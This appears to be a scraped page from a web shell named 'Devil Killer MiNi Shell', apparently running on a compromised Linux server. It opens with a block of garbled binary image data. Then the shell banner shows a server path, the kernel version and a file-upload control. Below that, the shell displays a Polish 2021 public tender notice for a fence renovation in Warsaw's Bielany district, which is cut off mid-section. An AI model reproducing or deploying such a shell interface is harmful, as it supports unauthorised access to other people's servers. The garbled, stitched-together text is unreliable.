JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20211008/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20211008/0022622401-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Renowacja ogrodzenia wokół Młodzieżowego Domu Kultury przy ul. Cegłowskiej 39 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Stołeczne Warszawa - Dzielnica Bielany</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 01525964000041</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">S. Żeromskiego 29</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">01-882</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48224434822</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bielany.zamowienia@um.warszawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bielany.um.warszawa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Renowacja ogrodzenia wokół Młodzieżowego Domu Kultury przy ul. Cegłowskiej 39 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6880420c-280b-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00226224</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000113/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.36 Renowacja ogrodzenia wokół Młodzieżowego Domu Kultury przy ul. Cegłowskiej 39</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.um.warszawa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Przekazywanie ofert, wniosków o dopuszczenie do udziału w postępowaniu o udzielenie<br/>zamówienia.Niezbędne wymagania sprzętowo- aplikacyjne, które musi spełniać komputer Wykonawcy.<br/>• Stałydostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s na<br/>komputer;•komputer PC/MAC z aktualnym systemem operacyjnym wspieranym przez producenta;<br/>•Zainstalowana przeglądarka wspierana przez producenta: MS Internet Explorer, Firefox,<br/>GoogleChrome lub MS Edge; • Zainstalowany program Acrobat Reader lub inny obsługujący pliki w<br/>formacie.pdf; Dopuszczalne wielkości i formaty przesyłanych danych.• Wielkość pojedynczego<br/>plikuzamieszczanego w systemie nieprzekraczająca 100 MB; • Dopuszczalne formaty plików: txt, rtf,<br/>pdf,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3,<br/>avi,mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng,<br/>xsl,xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc. Kodowanie i czas odbioru danych. • Plik<br/>załączonyi zapisany przez Wykonawcę, widoczny jest w Systemie, jako zaszyfrowany – format<br/>kodowania UTF8.Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez<br/>Zamawiającego po upływieterminu składania ofert; • Oznaczenie czasu odbioru danych przez<br/>Platformę stanowi datę orazdokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera<br/>synchronizowanego odpowiednimźródłem czasu - zegarem Głównego Urzędu Miar. Wymagania<br/>sprzętowo-aplikacyjne w zakresiepodpisywania ofert. 1. W przypadku składania wniosku lub oferty w<br/>formie elektronicznej(podpisywania dokumentów kwalifikowanym podpisem elektronicznym),<br/>Wykonawca musi posiadać: •Kwalifikowany podpis elektroniczny osoby składającej wniosek lub ofertę<br/>w Systemie; • Włączona wprzeglądarce obsługa JavaScript;• Zainstalowane na komputerze<br/>środowisko uruchomienioweORACLE JAVA (dla systemu Windows - w wersji 32 oraz 64 bitowej – do<br/>pobrania ze stronyproducenta w sekcji Java SE Runtime Environment 8u202 - Windows x86 Offline<br/>oraz Windowsx64,dla systemu Mac - do pobrania ze strony producenta w sekcji Java SE Development<br/>Kit 8u202 - MacOS X x64; alternatywnie do oprogramowania ORACLE - JAVA w wersji OpenJDK)•<br/>Zainstalowanaaplikacja Szafir Host, • Podłączony lub wbudowany w komputer czytnik kart podpisu<br/>elektronicznego. Prawidłowość zainstalowania w/w komponentów można zweryfikować po zalogowaniu<br/>do OnePlace,po kliknięciu przycisku „SPRAWDŹ PODPIS”. 2. W przypadku składania wniosku lub oferty w postaci elektronicznej (podpisywania dokumentów podpisem osobistym), wykonawca musi<br/>posiadać (dotyczypostępowań o wartości mniejszej niż progi unijne): • E-dowód osobisty osoby<br/>składającej wniosek lubofertę w Systemie; • Włączona w przeglądarce opcja obsługi JavaScript;•<br/>Zainstalowane nakomputerze środowisko uruchomieniowe ORACLE JAVA (dla systemu Windows - w<br/>wersji 32 oraz 64bitowej – do pobrania ze strony producenta w sekcji Java SE Runtime Environment<br/>8u202 - Windowsx86 Offline oraz Windowsx64, dla systemu Mac - do pobrania ze strony producenta w<br/>sekcji Java SEDevelopment Kit 8u202 - Mac OS X x64; alternatywnie do oprogramowania ORACLE -<br/>JAVA w wersjiOpenJDK)• Zainstalowana aplikacja Szafir Host; • Zainstalowane oprogramowanie do<br/>obsługi edowoduE-dowód menadżer dostępne na stronie https://www.gov.pl/web/e-dowod; •<br/>Podłączony lubwbudowany w komputer czytnik karty e-dowód. Prawidłowość zainstalowania w/w<br/>komponentówmożna zweryfikować po zalogowaniu do OnePlace, po kliknięciu przycisku „SPRAWDŹ<br/>PODPIS”. 3. Wprzypadku składania wniosku lub oferty w postaci elektronicznej (podpisywania<br/>dokumentów profilemzaufanym), wykonawca musi posiadać (dotyczy postępowań o wartości mniejszej<br/>niż progi unijne):•Profil zaufany osoby składającej wniosek lub ofertę w Systemie. Informacje<br/>dodatkowe. • Dokumenty wformacie „pdf" zaleca się podpisywać formatem PAdES. Z UWAGI NA<br/>OGRANICZENIA W LICZBIE ZNAKÓW POZOSTAŁĄ TREŚĆ ZAMIESZCZONO W SEKCJI IX.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">KLAUZULA INFORMACYJNA O PRZETWARZANIU<br/>DANYCH OSOBOWYCH(NA PODSTAWIE PRZEPISU PRAWA)Będziemy przetwarzać Pani/Pana<br/>dane osobowe, by mogła/mógł Pani/Pan załatwić sprawę w Urzędzie m.st. Warszawy. Mogą być<br/>przetwarzane w sposób zautomatyzowany, ale nie będą profilowane.Kto administruje moimi danymi?•<br/>Administratorem Pani/Pana danych osobowych przetwarzanych w Urzędzie m.st. Warszawy jest<br/>Prezydent m.st. Warszawy, z siedzibą w Warszawie (00-950), Pl. Bankowy 3/5. • Na pytania dotyczące<br/>sposobu i zakresu przetwarzania Pani/Pana danych, a także o przysługujące Pani/Panu prawa<br/>odpowie Inspektor Ochrony Danych w Urzędzie m.st. Warszawy. Proszę je wysłać na adres:<br/>iod@um.warszawa.pl.Dlaczego moje dane są przetwarzane?• Wynika to bezpośrednio z konkretnego<br/>przepisu prawa, tj. ustawy z dnia 11 września 2019 Prawo zamówień publicznych (t.j. Dz. U. z 2021 r.,<br/>poz.1129 ze zm.) oraz aktów wykonawczych do niej wydanych; ustawy z dnia 27 sierpnia 2009 r. o<br/>finansach publicznych, lub jest niezbędne do wykonania zadania w interesie publicznym albo w ramach<br/>sprawowania władzy publicznej.• Pani/Pana dane osobowe przetwarzane są w celu/celach: ubiegania<br/>się o udzielenie zamówienia publicznego.• Podanie przez Panią/Pana danych osobowych jest<br/>obowiązkowe. Jeśli Pani/Pan tego nie zrobi, nie będziemy mogli zrealizować Pana/Pani sprawy (Chyba<br/>że szczegółowe przepisy prawa stanowią inaczej). Jak długo będą przechowywane moje dane?•<br/>Pani/Pana dane osobowe będą przechowywane przez czas wymagany przepisami prawa, tj. czas<br/>prowadzonego postępowania o udzielenie zamówienia publicznego.Potem, zgodnie z przepisami,<br/>dokumenty trafią do archiwum zakładowego.Kto może mieć dostęp do moich danych?Odbiorcami<br/>Pani/Pana danych osobowych mogą być:a) podmioty, którym Administrator powierzy przetwarzanie<br/>danych osobowych, w szczególności:• podmioty świadczące na rzecz Urzędu m.st. Warszawy usługi<br/>informatyczne, pocztowe;• podmiot Platforma Aukcyjna Marketplanet;b) organy publiczne i inne<br/>podmioty, którym Administrator udostępni dane osobowe na podstawie przepisów prawa; Jakie mam<br/>prawa w związku z przetwarzaniem moich danych?• Ma Pani/Pan prawo do: 1. dostępu do danych<br/>osobowych, w tym uzyskania kopii tych danych;2. żądania sprostowania (poprawienia) danych<br/>osobowych;3. żądania usunięcia danych osobowych (tzw. prawo do bycia zapomnianym), w przypadku<br/>gdy:• dane nie są już niezbędne do celów, dla których były zebrane,lub w inny sposób przetwarzane;•<br/>nie ma podstawy prawnej do przetwarzania Pani/Pana danych osobowych;• wniosła Pani/Pan sprzeciw<br/>wobec przetwarzania i nie występują nadrzędne prawnie uzasadnione podstawy przetwarzania;•<br/>Pani/Pana dane przetwarzane są niezgodnie z prawem;• Pani/Pana dane muszą być usunięte, by<br/>wywiązać się z obowiązku wynikającego z przepisów prawa.4. żądania ograniczenia przetwarzania danych osobowych;5. sprzeciwu wobec przetwarzania danych – w przypadku, gdy łącznie spełnione są<br/>następujące przesłanki:• zaistnieją przyczyny związane z Pani/Pana szczególną sytuacją;• dane<br/>przetwarzane są w celu wykonania zadania realizowanego w interesie publicznym lub w ramach<br/>sprawowania władzy publicznej powierzonej Administratorowi, z wyjątkiem sytuacji, w której<br/>Administrator wykaże istnienie ważnych prawnie uzasadnionych podstaw do przetwarzanie danych<br/>osobowych, nadrzędnych wobec interesów, praw i wolności osoby, której dane dotyczą, lub podstaw<br/>do ustalenia, dochodzenia lub obrony roszczeń;6. Wniesienia skargi do Prezesa Urzędu Ochrony<br/>Danych Osobowych w przypadku powzięcia informacji o niezgodnym z prawem przetwarzaniu w<br/>Urzędzie m.st. Warszawy Pani/Pana danych osobowych.• Nie przysługuje Pani/Panu prawo do<br/>przenoszenia danych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">UD-III-WZP.271.40.2021.EPI</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 967065,04 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 406504,06 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest Renowacja ogrodzenia wokół Młodzieżowego Domu Kultury przy ul.Cegłowskiej 39.<br/>2.	Zakres zamówienia obejmuje<br/>Zakres zamówienia Wykonawca powinien zrealizować z zachowaniem wymagań określonych w Programie Funkcjonalno-Użytkowym opracowanym 16 sierpnia 2021r. przez mgr inż. Annę Piasecką-Bulwan, który obejmuje:<br/>a)	wykonanie projektu architektoniczno-budowlanego wraz z zagospodarowaniem terenu wraz z detalami wykonawczymi w 4 egz., w zakresie niezbędnym do prawidłowego wykonania przedmiotu umowy, na podstawie przekazanego przez Zamawiającego Programu Funkcjonalno-Użytkowego z 18 sierpnia 2021 r., opracowanego przez mgr inż. Annę Piasecką-Bulwan oraz przedłożenie go do akceptacji osobie do nadzoru wymienionej w § 8 ust.1 pkt 1) umowy, z uwzględnieniem poniższego zastrzeżenia. Wykonanie projektu architektoniczno-budowlanego należy podzielić na dwa etapy. Pierwszy etap obejmuje wykonanie projektu architektoniczno-budowlanego ogrodzenia w okresie nie dłuższym niż 1 tydzień od daty podpisania umowy, drugi etap obejmuje wykonanie projektu architektoniczno-budowlanego zagospodarowania terenu wraz z detalami wykonawczymi w okresie nie dłuższym niż 5 tygodni od daty podpisania umowy, lecz nie dłużej niż do 14 grudnia 2021 r.<br/>b)	wykonanie specyfikacji technicznych wykonania i odbioru robót budowlanych - dla etapu pierwszego i drugiego projektu architektoniczno-budowlanego – po 2 egz. oraz kosztorysów inwestorskich i przedmiarów – po 2 egz. dla etapu pierwszego i drugiego projektu architektoniczno-budowlanego, oraz przedłożenie ich do akceptacji osobie do nadzoru wymienionej w § 8 ust. 1 pkt 1) umowy w okresach nie dłuższych niż wskazanych w pkt 6.2. lit. a) SWZ.<br/>c)	wykonanie dokumentacji powykonawczej, po zakończeniu realizacji przedmiotu umowy – 1 egz. oraz przedłożenie go do akceptacji osobie do nadzoru wymienionej w § 8 ust. 1 pkt 1 w okresie minimum 3 dni przed datą odbioru końcowego prac.<br/>d)	pełnienie nadzoru autorskiego;<br/>e)	wykonanie kompletnych robót budowlano – montażowych dotyczących prac demontażowych starego ogrodzenia oraz montażu nowego na podstawie opracowanego projektu wykonawczego oraz specyfikacji technicznych wykonania i odbioru robót.<br/>3. Dostępność dla osób niepełnosprawnych<br/>Przedmiot zamówienia ma być dostosowany do potrzeb wszystkich użytkowników obiektu w tym przystosowany do poruszania się osób niepełnosprawnych. Musi spełniać wymagania odnośnie obowiązujących przepisów, w tym standardów wynikających z Zarządzenia nr 1682/2017 Prezydenta Miasta Stołecznego Warszawy z dnia 23 października 2017 r.<br/>4.	Wymagania związane z realizacją zamówienia w zakresie zatrudnienia przez wykonawcę lub podwykonawcę na podstawie stosunku pracy osób wykonujących czynności w zakresie realizacji zamówienia (klauzule społeczne):<br/>Stosownie do art. 95 ust. 1 ustawy Prawo zamówień publicznych, Zamawiający wymaga zatrudnienia (pod pojęciem „zatrudnionych” należy rozumieć nowo zatrudnionych jak również już zatrudnionych pracowników) przez WYKONAWCĘ lub PODWYKONAWCĘ do realizacji niniejszego zamówienia osób na podstawie stosunku pracy, w sposób określony w art. 22 par. 1 ustawy z dnia 26 czerwca 1974 r. – Kodeksu Pracy (Dz. U. 2019 poz. 1040 z późn. zm.) do wykonywania n/w czynności:<br/>1)	roboty rozbiórkowe;<br/>2)	roboty montażowe;<br/>3)	roboty z zakresu zagospodarowania terenu.<br/>Sposób weryfikacji zatrudnienia osób do ww. czynności oraz uprawnienia Zamawiającego w zakresie kontroli spełniania przez Wykonawcę wymagań związanych z zatrudnianiem tych osób oraz sankcji z tytułu niespełnienia tych wymagań zawarte zostały w projektowanych postanowieniach umowy – stanowiących załącznik nr 2 do SWZ.<br/>5.	SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA określa:<br/>a)	Program Funkcjonalno-Użytkowy (PFU) - stanowiący załącznik nr 4 do SWZ;<br/>oraz <br/>b)	Projektowane postanowienia umowy – stanowiące załącznik nr 2 do SWZ.<br/>W przypadku ewentualnych niezgodności pomiędzy dokumentami, wiodącym jest Program Funkcjonalno-Użytkowy (zał. nr 4 do SWZ).<br/>UWAGA: Powyższa dokumentacja może być wykorzystana tylko do celów udzielenia zamówienia publicznego.<br/>Zamawiający w opisie przedmiotu zamówienia (dot. Programu Funkcjonalno-Użytkowego) odniósł się do norm. W przypadku gdy Wykonawca zaoferuje wykonanie roboty budowlanej nie zgodnej ze wskazanymi normami wówczas na Wykonawcy spoczywa obowiązek udowodnienia, że proponowane rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45342000-6 - Wznoszenie ogrodzeń</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45421148-3 - Instalowanie bram</p> <p class="mb-0">45421160-3 - Instalowanie wyrobów metalowych</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">35 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Każda z ofert będzie oceniana wg poniższych kryteriów zgodnie z<br/>poniższym wzorem: <br/>P= PC+PGR +PN+PM<br/>gdzie:<br/>P – łączna ilość punktów oferty badanej<br/>PC - ilość punktów oferty badanej w kryterium „Cena brutto”<br/>PGR – ilość punktów oferty badanej w kryterium „Gwarancja i rekojmia”<br/>PN – ilość punktów oferty badanej w kryterium „Zatrudnienie osoby/-ób niepełnosprawnej/-ych, która/e będzie/będą uczestniczyć w wykonaniu zamówienia”<br/>PM – ilość punktów oferty badanej w kryterium „Zatrudnienie osoby/-ób młodocianej/-ych, która/e będzie/będą uczestniczyć w wykonaniu zamówienia”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie osoby/-ób niepełnosprawnej/-ych, która/e będzie/będą uczestniczyć w wykonaniu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie osoby/-ób młodocianej/-ych, która/e będzie/będą uczestniczyć w wykonaniu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku 